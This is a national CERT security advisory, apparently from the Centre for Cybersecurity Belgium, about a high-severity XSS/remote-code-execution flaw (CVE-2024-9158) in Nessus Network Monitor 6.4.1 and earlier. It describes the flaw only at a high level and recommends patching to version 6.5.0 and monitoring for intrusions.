Initiatives for
As the national authority for Cybersecurity the CCB has developed several initiatives for specific publics which are presented here.
WARNING: HIGH NESSUS NETWORK MONITOR VULNERABILITY
Image
Published : 02/10/2024
Reference:
Advisory #2024-234
Version:
1.0
Affected software:
Nessus Network Monitor (version: 6.4.1 and earlier)
Type:
Cross Site Scripting (XSS), Remote Code Execution (RCE)
CVE/CVSS:
CVE-2024-9158: CVSS 8.4 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H)
Sources
https://www.tenable.com/security/tns-2024-17
Risks
This vulnerability has a high impact on all aspects of the CIA triad (Confidentiality, Integrity, Availability).
It is unknown whether this vulnerability has been exploited.
Description
A remote, authenticated threat actor, after having obtained high privileges, such as administrator role, can inject arbitrary HTML and script code into the Nessus Network Monitor User Interface (UI) using the local Command Line Interface (CLI).
The reason for this vulnerability is insufficient sanitization of user-supplied data in the NNM UI.
Recommended Actions
Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing.
Please make sure to update NNM to version 6.5.0 or higher.
Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion.
In case of an intrusion, you can report an incident via: https://ccb.belgium.be/cert/report-incident
While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise.